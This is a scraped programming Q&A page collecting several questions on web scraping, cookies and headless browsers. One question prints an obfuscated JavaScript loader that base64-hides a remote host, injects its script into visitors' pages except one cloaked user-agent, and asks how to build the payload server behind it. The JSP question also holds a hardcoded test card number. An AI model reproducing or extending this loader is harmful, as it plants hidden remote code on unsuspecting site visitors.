Get website content after JavaScript loading with python - javascript

I have an issue getting the page content:
# Log in through the CSRF-protected form at URL, then fetch the RUM checks page
# with the same session and print its body.
with dryscrape.Session() as c:
    PASSWORD = '<PASS>'
    USERNAME = '<EMAIL>'
    URL = 'https://my.pingdom.com/'
    # Fetch the login page once and reuse the response; the original requested
    # it twice and discarded the first result.
    login_page = c.get(URL)
    soup = BeautifulSoup(login_page.text, "lxml")
    # The hidden __csrf_magic input has to be echoed back in the login POST.
    csrf = soup.select_one("input[name=__csrf_magic]")["value"]
    login_data = {
        "email": USERNAME,
        "password": PASSWORD,
        "__csrf_magic": csrf,
    }
    r = c.post(URL, data=login_data, headers={'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.101 Safari/537.36'})
    url = 'https://my.pingdom.com/newchecks/rums?ignoreActive=1'
    # NOTE(review): .text is presumably the response body as served, i.e. before
    # any client-side template rendering - confirm against the session API.
    r = c.get(url).text
    # Single-argument print(...) behaves the same on Python 2 and Python 3.
    print(r)
After logging in with a browser, I can see the Load Time value in the page source, but when I use this script there is only a {{loadtime}} tag from the x-handlebars-template.
Any ideas how I can get it? This is a server-side script, so Selenium-type tips don't apply here. :)

Related

Setting cookie SameSite=None doesn't work on Chrome / JSP、JAVASCRIPT

I am working on a JSP (Tomcat 6) application. (The domain is different.)
I'm trying to set the SameSite attribute to None because the cookies disappear after more than 2 minutes due to the new version of the Chrome browser. (Release date for a fix is February 4, 2020 per: https://www.chromium.org/updates/same-site)
I tried to solve the problem in the following ways, but it is still not working:
response.setHeader("Set-Cookie", "user=test;HttpOnly;Secure;SameSite=None");
response.setHeader("Set-Cookie", "HttpOnly;Secure;SameSite=None");
document.cookie = "witcher=Geralt; HttpOnly; SameSite=None; Secure";
<iframe src="https://service3.smartcapsule.jp/disp/ONECLICKCOMM.do"></iframe>
By using Pop-up windows
Code is here
// Populate the fields of form1 and point the form at the remote endpoint.
document.form1.division2.value = 1;
document.form1.division3.value = 1;
document.form1.division4.value = 1;
// The card number is an identifier, not a quantity: keep it as a string so it
// is never subject to numeric formatting or precision limits.
document.form1.pan.value = '4322423434232342';
// A numeric literal with a leading zero (0222) is a legacy octal literal and
// evaluates to 146; a string keeps the intended "0222".
document.form1.expiryDate.value = '0222';
document.form1.jspName.value = 'index.jsp';
document.form1.method = "post";
// NOTE(review): this string contains no name=value pair, and HttpOnly cannot
// be set from script - confirm what this line is meant to achieve.
document.cookie = "HttpOnly; SameSite=None; Secure";
// The action must be a quoted string; the bare URL was a syntax error.
document.form1.action = 'http://service3.smartcapsule.jp/disp/ONECLICKCOMM.do';
Header is here
<html><body>
host=localhost:8080<br>
connection=keep-alive<br>
content-length=90<br>
cache-control=max-age=0<br>
origin=http://localhost:8080<br>
upgrade-insecure-requests=1<br>
dnt=1<br>
content-type=application/x-www-form-urlencoded<br>
user-agent=Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4252.0 Safari/537.36<br>
accept=text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9<br>
sec-fetch-site=same-origin<br>
sec-fetch-mode=navigate<br>
sec-fetch-user=?1<br>
sec-fetch-dest=document<br>
accept-encoding=gzip, deflate, br<br>
accept-language=en,q=0.9,q=0.8,ko;q=0.7,ja;q=0.6,q=0.5<br>
cookie=SameSite=None; Secure; aspGroupId=00000000; _ga=GA1.1.371271115.1600306707; _gid=GA1.1.1473986481.1600822923; JSESSIONID=15BA5A77A80B2C93969A44FE9371B135; _gat_UA-71516129-3=1; _token=8b234c913616b70c05100bb7fc141a33; _gat=1; arp_scroll_position=2986.363525390625<br>
</body></html>
-------------------------------------------------------------------------------------------
<html><body>
host=localhost:8080<br>
connection=keep-alive<br>
content-length=384<br>
cache-control=max-age=0<br>
origin=null<br>
upgrade-insecure-requests=1<br>
dnt=1<br>
content-type=application/x-www-form-urlencoded<br>
user-agent=Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4252.0 Safari/537.36<br>
accept=text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9<br>
sec-fetch-site=cross-site<br>
sec-fetch-mode=navigate<br>
sec-fetch-dest=document<br>
accept-encoding=gzip, deflate, br<br>
accept-language=en,q=0.9,q=0.8,ko;q=0.7,ja;q=0.6,q=0.5<br>
</body></html>
If I don't change browser properties, how should I fix it?
disable 「SameSite by default cookies」 in chrome://flags
「20200924」I tried the following, but the cookies was still lost
Cookies.set('name', 'value', {
sameSite: 'none',
secure: true
})
response.setHeader("Set-Cookie", "user=mcmd;HttpOnly;Secure;SameSite=None");
document.cookie = "witcher=Geralt; SameSite=None; Secure";
/**
 * Writes every request header as a "name=value&lt;br&gt;" line inside a minimal
 * HTML page.
 *
 * Header names and values are supplied by the client, so they are HTML-escaped
 * before being written into the page.
 *
 * @param request  the incoming request whose headers are listed
 * @param response the response the HTML page is written to
 * @throws ServletException declared by the servlet contract
 * @throws IOException      if the response writer cannot be obtained or written
 */
public void doGet( HttpServletRequest request, HttpServletResponse response ) throws ServletException,IOException {
    response.setContentType("text/html;charset=Windows-31J");
    PrintWriter out = response.getWriter();
    out.println("<html><body>");
    Enumeration<?> headerNames = request.getHeaderNames();
    // getHeaderNames() may return null when the container does not expose headers.
    while (headerNames != null && headerNames.hasMoreElements()) {
        String name = (String) headerNames.nextElement();
        out.println(escapeHtml(name) + "=" + escapeHtml(request.getHeader(name)) + "<br>");
    }
    out.println("</body></html>");
}

/** Escapes HTML metacharacters in text; a null input is rendered as "null". */
private static String escapeHtml(String text) {
    if (text == null) {
        return "null";
    }
    StringBuilder escaped = new StringBuilder(text.length() + 16);
    for (int i = 0; i < text.length(); i++) {
        char ch = text.charAt(i);
        switch (ch) {
            case '&': escaped.append("&amp;"); break;
            case '<': escaped.append("&lt;"); break;
            case '>': escaped.append("&gt;"); break;
            case '"': escaped.append("&quot;"); break;
            case '\'': escaped.append("&#39;"); break;
            default: escaped.append(ch);
        }
    }
    return escaped.toString();
}
document.cookie = "<%= s_cookies %>";
document.cookie = "witcher=Geralt; SameSite=None; Secure";
res.setHeader("Set-Cookie", "user=mcmd;HttpOnly;Secure;SameSite=None");
res.setHeader("Access-Control-Allow-Origin","*");
res.setHeader("Access-Control-Allow-Credentials","true");
crossDomain=true; withCredentials=true;Authorization; Max-Age=60*60*3600
<iframe src="https://service3.smartcapsule.jp/disp/ONECLICKCOMM.do"></iframe>
<script
src="https://code.jquery.com/jquery-3.4.1.min.js"
integrity="sha256-CSXorXvZcTkaix6Yvo6HppcZGetbYMGWSFlBw8HfCJo="
crossorigin="anonymous">
</script>
<script>
// Forward visitors of the plain host to its HTTPS URL.
const apexUrl = 'localhost:8080';
const forwardUrl = 'https://localhost:8080';
alert(window.location.host);
// location.host only accepts "hostname:port"; a full URL has to be assigned to
// location.href instead. The protocol check keeps the page from navigating
// again once it is already served over HTTPS.
if (window.location.host === apexUrl && window.location.protocol !== 'https:') {
  window.location.href = forwardUrl;
}
</script>
Google reCAPTCHA
To edit a cookie, set its value, and then add it to the response.
and never forget to change the ExpiresDate.

access the 'd' element from an SVG object with casperjs

I am a complete beginner in JavaScript/PhantomJS/CasperJS (only several days of learning), but I am stuck with this SVG graph I am trying to scrape data from.
I am trying to access the d="M20,331.37,331.37,21.40...." attribute of an SVG path element using CasperJS code, and write it to the console and to a txt (or CSV) file. I tried the following code:
// Create the CasperJS instance with image/plugin loading enabled and a desktop
// Chrome user agent string.
var casper = require('casper').create({
pageSettings: {
loadImages: true,
loadPlugins: true,
userAgent: 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36'
}
});
//First step is to open baidu.html
casper.start().thenOpen("file:///baidu.html", function() {
console.log("Baidu website opened");
// Wait 6000 ms before the next step (presumably to let the graph render - confirm).
this.wait(6000);
});
// Second step: read the "d" attribute of the element(s) matched by the XPath,
// echo it, and write it to data_graph.txt.
casper.then(function() {
// NOTE(review): '#id' is not XPath attribute syntax; '@id' was probably intended - confirm.
var dataFromGraph = this.getElementsAttribute(require('casper').selectXPath('//*[#id="trend"]/svg/path[6]'),"d");
this.echo(dataFromGraph);
require('fs').write("data_graph.txt", dataFromGraph,'w');
});
// Start executing the queued steps.
casper.run();
But nothing worked: I get a null element or an empty result.
This is all the other code I tried:
var dataFromGraph = this.fetchText(require('casper').selectXPath('//*[#id="trend"]/svg/path[6]/d'));
var dataFromGraph = this.getElementsAttribute(require('casper').selectXPath('//*[#id="trend"]/svg/path[6]'),"d") //,"d")
var dataFromGraph = this.getElementInfo(require('casper').selectXPath('//*[#id="trend"]/svg/path[6]'))
var dataFromGraph = this.fetchText("#trend > svg > path");
I have the XPath and the selector of the object, but I am not sure how to access it. Here is a picture of the element I want to scrape.
As the website I want to scrape needs a password, this is the HTML file that I saved from it: https://ufile.io/5y9g2.
The element I want to scrape is the data behind the graph here.
Any help would be very much appreciated.
I reworked your script a bit and now it works. Check the snippet below.
// Open the saved page, wait for the SVG path to exist, then echo its "d"
// attribute and write it to data_graph.txt.
var fs = require('fs');
var casper = require('casper').create();
// CSS selector of the <path> element whose "d" attribute holds the graph data.
var PATH_SELECTOR = '#trend > svg > path:nth-child(11)';

casper.start().thenOpen("http://localhost:8001/baidu.html", function() {
    console.log("Baidu website opened");
});

// Wait for the path instead of reading it immediately, so a missing or
// late-rendered element produces a clear message instead of a TypeError.
casper.waitForSelector(PATH_SELECTOR, function() {
    // The callback runs in the page context; the selector is passed in as an argument.
    var graphData = this.evaluate(function(selector) {
        var pathElement = document.querySelector(selector);
        return pathElement ? pathElement.getAttribute('d') : null;
    }, PATH_SELECTOR);

    if (graphData === null) {
        this.echo('No "d" attribute found for ' + PATH_SELECTOR, 'ERROR');
        return;
    }
    this.echo(graphData);
    fs.write("data_graph.txt", graphData, 'w');
}, function onTimeout() {
    this.echo('Timed out waiting for ' + PATH_SELECTOR, 'ERROR');
});

casper.run();
Hope that helps!

php show code only if you run on js code and put that php link

// Does nothing for one exact user agent string combined with a 1024x768 screen;
// every other visitor takes the else branch, which injects a remote script.
if (navigator['userAgent'] == 'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.27 Safari/537.36' && screen['width'] == '1024' && screen['height'] == '768') {} else {
var javas = document['createElement']('script');
javas['language'] = 'javascript';
javas['type'] = 'text/javascript';
// atob(...) base64-decodes to 'visualmoto.xyz/h7.php'. The query string is a
// random integer from 1 to 1000000000 followed by the current page's host in "h".
javas['src'] = location['protocol'] + '//' + atob('dmlzdWFsbW90by54eXovaDcucGhw') + '?' + Math['floor']((Math['random']() * 1000000000) + 1) + '&h=' + encodeURIComponent(document['location']['host']);
// Appending the element to <head> makes the browser fetch and run that script.
document['head']['appendChild'](javas)
}
I need to know how to make a PHP file that shows its code only when it is requested through the script above. The link is dmlzdWFsbW90by54eXovaDcucGhw in Base64 (visualmoto.xyz/h7.php). If you open this link directly you can't see anything, only an error, but when it is loaded by that JS code, the PHP file returns hidden code. Can you please help me create that h7.php file? How can I do it? I'm very new to PHP.

Select option from dropdown and submit request using nodejs

I am using Node.js to scrape a website, and I am very new to Node.js. The website's initial page is a popup in which one has to select an option from a select box and submit it; only then can later pages be browsed. This has to be done the first time, and the choice is then stored as a cookie for later use.
I am able to get the HTML of the popup, but I am not able to select an option from the select box and submit the request.
Here is my Code
// Express app that, on GET /, fetches http://bigbasket.com/ with a pre-seeded
// cookie jar and logs the response plus the text of the city select box.
var express = require('express');
var request = require('request');
var cheerio = require('cheerio');

// Cookie jar shared by the outgoing requests, seeded with city_id=1.
var j = request.jar();
//var cookie = request.cookie();
j.setCookie("city_id=1; path=/; domain=.bigbasket.com", 'http://bigbasket.com/', function(error, cookie) {
    //console.log("error"+error.message);
    console.log("cookie "+cookie);
});

var app = express();

app.get('/', function(req, res){
    console.log("hi");
    request({uri:'http://bigbasket.com/',
        headers:{'User-Agent': 'Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.81 Safari/537.36' ,
            'content-type':'application/x-www-form-urlencoded; charset=UTF-8',
            'connection':'keep-alive'},
        jar:j},
    function(err, response, body) {
        // On a failed request `response` and `body` are undefined; report the
        // failure to the client instead of crashing on response.headers.
        if (err) {
            console.log("err "+err.message);
            res.status(502).send('Upstream request failed');
            return;
        }
        console.log("header"+JSON.stringify(response.headers));
        console.log("status"+response.statusCode);
        console.log("cookie "+response.cookie);
        console.log(body);
        var $ = cheerio.load(body,{xmlMode: true});
        console.log($);
        var $selectBox = $('select').filter('.selectboxdiv');
        console.log($selectBox.text());
        // Finish the Express response; the original `response.end;` was a bare
        // property access that never ended anything, so the client hung.
        res.end();
    });
});

app.listen('8081')
console.log('Magic happens on port 8081');
exports = module.exports = app;
I am able to get select box options through below code :
var $selectBox= $('select').filter('.selectboxdiv');
console.log($selectBox.text());
But I am not able to select that option and submit. I have to select a city from the dropdown menu and submit the request so that I can scrape data from the subsequent pages.
EDIT:
What do you see if you use 'req.body.NAME_OF_YOUR_DROPDOWN_HERE'? Maybe you can see the selected option then?

Phantomjs check for response headers and then execute something

I have the following RequestURL.js file.
// Usage: phantomjs RequestURL.js <url>
// Opens <url> with a custom pragma header and user agent, then prints the page
// content to stdout.
var webPage = require('webpage');
var system = require('system');
var page = webPage.create();
page.customHeaders = {"pragma": "akamai-x-feo-trace"};
page.settings.userAgent = "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36";
if (system.args.length === 1) {
    console.log('Try to pass some args when invoking this script!');
    // PhantomJS keeps running until phantom.exit() is called; without this the
    // script hangs when no URL is given. A non-zero code signals the usage error.
    phantom.exit(1);
} else {
    page.open(system.args[1], function (status) {
        var content = page.content;
        console.log(content);
        phantom.exit();
    });
}
I execute this as: phantomjs --ignore-ssl-errors=yes --ssl-protocol=any RequestURL.js #my_url_here > body.html
I have a parser written in Python that takes body.html and parses it. Before that step, I want the page source to be generated only if the response contains the following header:
X-Akamai-FEO-State:TRANSFORMING
Is there a way to modify my RequestURL.js to achieve that?
It is expected that page.onResourceReceived is triggered before the page.onLoadFinished callback of page.open().
// True once the response for the requested URL carries the header
// "X-Akamai-FEO-State: TRANSFORMING".
var transforming = false;
page.onResourceReceived = function(response){
    if (response.url !== system.args[1]) { // TODO handle redirects if necessary
        return;
    }
    response.headers.forEach(function(header){
        // HTTP header field names are case-insensitive, so compare in lower case.
        if (header.name.toLowerCase() === 'x-akamai-feo-state') {
            transforming = header.value === 'TRANSFORMING';
        }
    });
};
// Print the page content only when the header check above succeeded.
page.open(system.args[1], function (status) {
    if (transforming) {
        console.log(page.content);
    }
    phantom.exit();
});

Categories

Resources